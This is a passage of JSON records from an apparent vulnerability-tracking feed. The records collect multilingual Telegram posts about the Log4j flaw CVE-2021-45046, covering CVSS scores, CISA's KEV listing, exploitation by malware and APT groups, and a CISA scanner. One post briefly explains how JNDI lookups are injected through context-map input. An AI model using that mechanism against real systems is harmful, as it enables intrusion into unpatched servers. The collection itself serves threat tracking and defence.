(Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFIRST-EPSS: 0.973630000\nNVD-IS: 6.0\nNVD-ES: 2.2", "creation_timestamp": "2024-04-09T05:20:07.000000Z"}, {"uuid": "8918a833-9bd1-4951-b897-629271d55a1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "Telegram/_URrgi_ugWAyYY1Gb5I-PE6Qg7nO6YbwxbXSuh_zqDNy3g", "content": "", "creation_timestamp": "2023-05-02T08:37:02.000000Z"}, {"uuid": "868baf73-a22f-4c19-8397-fcc5e6ce1a38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/YE_0x/770", "content": "\u0623\u0636\u0627\u0641\u062a \u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0623\u0645\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0648\u0623\u0645\u0646 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u0623\u0645\u0631\u064a\u0643\u064a\u0629 (CISA) \u062b\u0644\u0627\u062b\u0629 \u0639\u064a\u0648\u0628 \u0625\u0644\u0649 \u0643\u062a\u0627\u0644\u0648\u062c \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u063a\u0644\u0629 \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 (KEV) \u060c \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u062f\u0644\u064a\u0644 \u0639\u0644\u0649 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0646\u0634\u0637.\n\nCVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability\nCVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability\nCVE-2023-21839 (CVSS score: 7.5) - Oracle WebLogic Server Unspecified Vulnerability\n\n\ud83d\udea8 ===============\n\ud83d\udd30 #0xYE\n\ud83d\udd30 #Cyber_Security\n\ud83d\udd30 #Yemeni_Hackers \n\ud83d\udd30 @YE_0x\n\ud83d\udea8===============", "creation_timestamp": "2023-07-06T16:19:06.000000Z"}, {"uuid": "905a698b-af50-4d2b-8201-bdf856499c30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/clonru/107329", "content": "\u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache log4j\n\n Log4jshell CVE-2021-44228 \u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 JNDI \u0432 Apache Log4j2 2.0-beta9 (\u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.14.1) \u0432 \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c LDAP \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043a\u0443\u0434\u0430 \u0443\u0433\u043e\u0434\u043d\u043e. \u0425\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0438\u043b\u0438 \u0438\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LDAP. CVE-2021-45046 \u0411\u044b\u043b\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 CVE-2021-44228 \u0432 Apache Log4j 2.15.0 \u0431\u044b\u043b\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u043f\u0440\u0438 \u0432\u044b\u0431\u043e\u0440\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043d\u0435 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u0415\u0441\u043b\u0438 \u043f\u0440\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0436\u043e\u043d\u0433\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u0448\u0430\u0431\u043b\u043e\u043d \u0441 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u043c (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u00ab$${ctx:LoginID}\u00bb), \u0445\u0430\u043a\u0435\u0440\u044b, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0432\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Thread Context Map (MDC), \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 JNDI Lookup. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u0451\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b... \n\n http://forumpolitika.org/component/k2/item/87406 \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: @gubernatorskay \u0438 @progekt_kz", "creation_timestamp": "2023-08-11T02:04:26.000000Z"}, {"uuid": "1efe7d8e-24a4-4e6a-be54-3eb4e6de3337", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/freelearningtech/609", "content": "Log4j vulnerability CVSS details\nCVE-2021-44228\u00a0(CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)\n\nCVE-2021-45046\u00a0(CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)\n\nCVE-2021-45105\u00a0(CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)\n\nCVE-2021-4104\u00a0(CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.0)\n\n\n\u2764\ufe0f\u2764\ufe0f Enjoy and Share \u2764\ufe0f\u2764\ufe0f\n\nSupport Us \u2764\ufe0f\nChannel : @freelearningtech\nGroup : @freelearningtech21\nWebsite : https://freelearningtech.in/", "creation_timestamp": "2021-12-20T06:50:30.000000Z"}, {"uuid": "73f40d30-5172-4bfd-9ea1-932e969a8b83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/true_secator/2450", "content": "\u200b\u200b\u0412\u044b\u0437\u0432\u0430\u043d\u043d\u0430\u044f Log4Shell \u043a\u0438\u0431\u0435\u0440\u043f\u0430\u043d\u0434\u0435\u043c\u0438\u044f \u0432 \u0441\u0444\u0435\u0440\u0435 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u043d\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u043d\u043e\u0432\u044b\u0435 \u043e\u0431\u043e\u0440\u043e\u0442\u044b.\n \n\u041d\u0430\u0440\u044f\u0434\u0443 \u0441 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u0431\u043e\u043b\u0435\u0435 1,8 \u043c\u043b\u043d. \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-44228 \u0432 Log4j, \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0447\u0438\u043d\u0430\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432\u0442\u043e\u0440\u0443\u044e \u0438 \u0442\u0440\u0435\u0442\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n \n\u042d\u0442\u043e \u0432\u0441\u0435 \u043f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043e \u0431\u043e\u043b\u0435\u0435 60 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u0431\u0430\u0433\u0443 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432 malware, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u0432\u0435\u0441\u044c \u0441\u043f\u0435\u043a\u0442\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0432\u043e\u0437\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439 \u043e\u0442 \u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u0442\u0440\u043e\u044f\u043d\u043e\u0432 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0434\u043e \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432 \u0438 \u0432\u0435\u0431-\u043e\u0431\u043e\u043b\u043e\u0447\u0435\u043a. \u0418, \u0447\u0442\u043e \u0435\u0449\u0435 \u0445\u0443\u0436\u0435, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c MSTIC, \u0431\u0440\u043e\u043a\u0435\u0440\u044b \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u0434\u043b\u044f \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0432 \u0446\u0435\u043b\u0435\u0432\u044b\u0435 \u0441\u0435\u0442\u0438, \u043b\u0430\u0437\u0435\u0439\u043a\u0438 \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0442\u0435\u043c \u0431\u044b\u043b\u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u044b \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f\u043c.\n \n\u041d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u044b \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u0410\u0420\u0422, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u041a\u0438\u0442\u0430\u0435\u043c (Hafnium), \u0418\u0440\u0430\u043d\u043e\u043c (APT 35 aka Phosphorus), \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0439 \u0438 \u0422\u0443\u0440\u0446\u0438\u0435\u0439, \u0432 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0432 \u043c\u043e\u043c\u0435\u043d\u0442\u0435 \u0441\u0438\u0441\u0442\u0435\u043c, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u043e\u0442 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043e \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445.\n \n\u0410 \u0442\u0435\u043f\u0435\u0440\u044c Cloudflare \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u0431\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432\u0447\u0435\u0440\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0435\u0440\u0435\u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u043d\u0430 \u0432\u0442\u043e\u0440\u0443\u044e CVE, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0443\u044e \u0432 \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 Log4j.\n \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-45046  \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Log4j \u043e\u0442 2.0-beta9 \u0434\u043e 2.12.1 \u0438 \u043e\u0442 2.13.0 \u0434\u043e 2.15.0 \u0438 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u043d\u0435\u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Apache Software Foundation \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 CVE \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445, \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u0445 \u043e\u0442 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u041d\u0435\u043f\u043e\u043b\u043d\u044b\u0439 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f CVE-2021-44228 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0432\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u043f\u043e\u0438\u0441\u043a\u0430 JNDI, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0430\u0442\u0430\u043a\u0435 \u0442\u0438\u043f\u0430 \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 (DoS). \u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0435\u0435 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u0444\u0438\u043a\u0441\u0438\u043b\u0438 \u0432 Log4j \u0432\u0435\u0440\u0441\u0438\u0438 2.16.0.\n \n\u0415\u0449\u0435 \u0431\u043e\u043b\u044c\u0448\u0443\u044e \u0442\u0440\u0435\u0432\u043e\u0433\u0443 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 Praetorian, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e \u0442\u0440\u0435\u0442\u044c\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Log4j \u0432\u0435\u0440\u0441\u0438\u0438 2.15.0, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043a\u0440\u0430\u0436\u0438 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445. \u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u0440\u0430\u0437\u0433\u043b\u0430\u0448\u0430\u044e\u0442\u0441\u044f, \u0434\u0430\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0439 \u043a\u043e\u043b\u043b\u0430\u043f\u0441, \u0438, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0435\u0449\u0435 \u0438 \u043f\u043e\u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f 2.16.0, \u043f\u043e \u0432\u0441\u0435\u0439 \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0435\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439.\n \n\u041c\u043e\u0436\u0435\u0442\u0435 \u0441\u0430\u043c\u0438 \u043e\u0446\u0435\u043d\u0438\u0442\u044c, \u043a\u0430\u043a \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 Log4j 2.15.0.", "creation_timestamp": "2021-12-16T12:58:15.000000Z"}, {"uuid": "2c94859c-ea24-498f-93d5-c42cb008f3ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/CyberSecurityIL/8227", "content": "\u05d4\u05e1\u05d5\u05db\u05e0\u05d5\u05ea \u05dc\u05d4\u05d2\u05e0\u05ea \u05e1\u05d9\u05d9\u05d1\u05e8 \u05d5\u05ea\u05e9\u05ea\u05d9\u05d5\u05ea \u05d1\u05d0\u05e8\u05d4\"\u05d1 (CISA) \u05de\u05e4\u05e8\u05e1\u05de\u05ea \u05db\u05dc\u05d9 \u05dc\u05e1\u05e8\u05d9\u05e7\u05ea \u05e9\u05e8\u05ea\u05d9\u05dd \u05d4\u05e4\u05d2\u05d9\u05e2\u05d9\u05dd \u05dc\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05e9\u05d6\u05d5\u05d4\u05d5 \u05d1\u05e1\u05e4\u05e8\u05d9\u05d9\u05ea Log4j.\n\n\u05d4\u05db\u05dc\u05d9 \u05e9\u05e4\u05d5\u05e8\u05e1\u05dd \u05d9\u05d9\u05d3\u05e2 \u05dc\u05d6\u05d4\u05d5\u05ea \u05e9\u05e8\u05ea\u05d9\u05dd \u05d4\u05d7\u05e9\u05d5\u05e4\u05d9\u05dd \u05dc\u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea CVE-2021-44228 \u05d5-CVE-2021-45046 \u05d4\u05e7\u05d9\u05d9\u05de\u05d9\u05dd \u05d1\u05e1\u05e4\u05e8\u05d9\u05d9\u05ea Log4j. \n\u05dc\u05db\u05dc\u05d9 \u05e9\u05e4\u05d5\u05e8\u05e1\u05dd \u05d9\u05e9 \u05de\u05e1\u05e4\u05e8 \u05d9\u05db\u05d5\u05dc\u05d5\u05ea \u05db\u05d2\u05d5\u05df: \n\n- \u05e1\u05e8\u05d9\u05e7\u05d4 \u05dc\u05e4\u05d9 URL\n- \u05e1\u05e8\u05d9\u05e7\u05d4 \u05e9\u05dc \u05dc\u05de\u05e2\u05dc\u05d4 \u05de-60 Headr-\u05d9\u05dd \u05e9\u05d5\u05e0\u05d9\u05dd \u05d1\u05d4\u05dd \u05e0\u05d9\u05ea\u05df \u05dc\u05e9\u05ea\u05d5\u05dc \u05e1\u05e7\u05e8\u05d9\u05e4\u05d8 \u05d6\u05d3\u05d5\u05e0\u05d9. \n- \u05d6\u05d9\u05d4\u05d5\u05d9 \u05e9\u05dc \u05ea\u05e2\u05d1\u05d5\u05e8\u05d4 \u05d7\u05e9\u05d5\u05d3\u05d4 \u05e2\u05dc \u05d2\u05d1\u05d9 \u05e4\u05e8\u05d5\u05d8\u05d5\u05e7\u05d5\u05dc dns \u05d5\u05e2\u05d5\u05d3.\n\n\u05d0\u05dd \u05e2\u05d3 \u05e2\u05db\u05e9\u05d9\u05d5 \u05d7\u05dc\u05e7\u05db\u05dd \u05d4\u05e2\u05d3\u05e4\u05ea\u05dd \u05dc\u05d0 \u05dc\u05e2\u05e9\u05d5\u05ea \u05e9\u05d9\u05de\u05d5\u05e9 \u05d1\u05db\u05dc\u05d9\u05dd \u05d3\u05d5\u05de\u05d9\u05dd \u05d4\u05de\u05ea\u05e4\u05e8\u05e1\u05de\u05d9\u05dd \u05e2\"\u05d9 \u05d9\u05d7\u05d9\u05d3\u05d9\u05dd \u05d5\u05d7\u05d1\u05e8\u05d5\u05ea \u05e4\u05e8\u05d8\u05d9\u05d5\u05ea, \u05db\u05e2\u05ea \u05e0\u05d9\u05ea\u05df \u05dc\u05d4\u05d5\u05e8\u05d9\u05d3 \u05d0\u05ea \u05d4\u05db\u05dc\u05d9 \u05e9\u05de\u05e4\u05d5\u05e8\u05e1\u05dd \u05e2\"\u05d9 CISA \u05db\u05e7\u05d5\u05d3 \u05e4\u05ea\u05d5\u05d7 \u05de\u05de\u05e9 \u05db\u05d0\u05df \ud83d\udc47\ud83c\udffb \n\nhttps://github.com/cisagov/log4j-scanner\n\nhttps://t.me/joinchat/VRKwnb9-k8CSIizf", "creation_timestamp": "2021-12-22T17:11:25.000000Z"}, {"uuid": "ba27657a-a938-4849-8082-02a6e5ee23f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/hacker_trick/555", "content": "\u062b\u063a\u0631\u0629 Log4Shell \n\u0627\u0644\u0623\u0633\u0628\u0648\u0639 \u0627\u0644\u0645\u0627\u0636\u064a \u062a\u0645 \u0637\u0631\u062d\u00a0\u0627\u0644\u0625\u0635\u062f\u0627\u0631 2.15 \u0645\u0646 \u0623\u062f\u0627\u0629 \u0627\u0644\u062a\u0633\u062c\u064a\u0644 Log4j \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u062b\u063a\u0631\u0629\u00a0CVE-2021-44228 \u062d\u064a\u062b \u062a\u0645 \u0625\u0644\u063a\u0627\u0621 \u0627\u062a\u0627\u062d\u0629 \u062c\u0627\u0646\u0628 \u0648\u0627\u062d\u062f \u0641\u0642\u0637 \u0645\u0646 \u0648\u0638\u0627\u0626\u0641 \u0627\u0633\u062a\u0631\u062c\u0627\u0639 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u0641\u064a JNDI \u062b\u0645 \u062a\u0628\u064a\u0646 \u0623\u0646\u0647 \u0644\u0627 \u064a\u0632\u0627\u0644 \u0645\u0646 \u0627\u0644\u0645\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 2.15 \u0645\u0646 \u062e\u0644\u0627\u0644 \u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0645\u0639\u064a\u0646\u0629 \u0648\u0644\u0643\u0646 \u062a\u0645 \u062d\u062c\u0628 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0641\u0646\u064a\u0629 \u0627\u0644\u0625\u0636\u0627\u0641\u064a\u0629 \u0644\u0644\u062e\u0637\u0623 \u0644\u0645\u0646\u0639 \u0627\u0644\u0645\u0632\u064a\u062f \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n_ \u0623\u0642\u0631\u062a \u0634\u0631\u0643\u0629 Apache \u0628\u0627\u0644\u062e\u0637\u0623 \u0645\u0631\u0629 \u0623\u062e\u0631\u0649 \u0648\u0644\u0630\u0644\u0643 \u0642\u0627\u0645\u062a \u0628\u062a\u0639\u0637\u064a\u0644 \u0643\u0627\u0641\u0629 \u062f\u0639\u0645 JNDI \u0628\u0634\u0643\u0644 \u0627\u0641\u062a\u0631\u0627\u0636\u064a \u0648\u0625\u0632\u0627\u0644\u0629 \u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u062a\u0645\u0627\u0645\u0627 \u0648\u0642\u0627\u0645\u062a \u0628\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u0625\u0635\u0644\u0627\u062d \u0627\u0644\u062b\u0627\u0646\u064a 